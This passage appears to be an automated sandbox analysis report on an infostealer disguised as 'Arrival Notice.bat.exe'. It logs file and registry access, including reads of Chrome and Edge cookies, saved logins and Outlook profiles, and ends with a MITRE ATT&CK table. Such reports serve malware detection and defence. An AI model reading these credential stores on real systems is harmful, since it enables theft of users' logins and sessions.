              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe, Queries volume information: C:\Users\user\AppData\Roaming\dLrZsz.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exe, Queries volume information: C:\Users\user\AppData\Local\Temp\-6qxw.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exe, Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: C:\Windows\SysWOW64\runonce.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
              Source: C:\Windows\SysWOW64\runonce.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\runonce.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\runonce.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\runonce.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\runonce.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
              Source: C:\Windows\SysWOW64\runonce.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
              Source: C:\Windows\SysWOW64\runonce.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\SysWOW64\compact.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
              Source: C:\Windows\SysWOW64\runonce.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

              Remote Access Functionality

              | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
              |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
              | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 221 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
              | Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 13 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
              | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
              | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction |
              | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
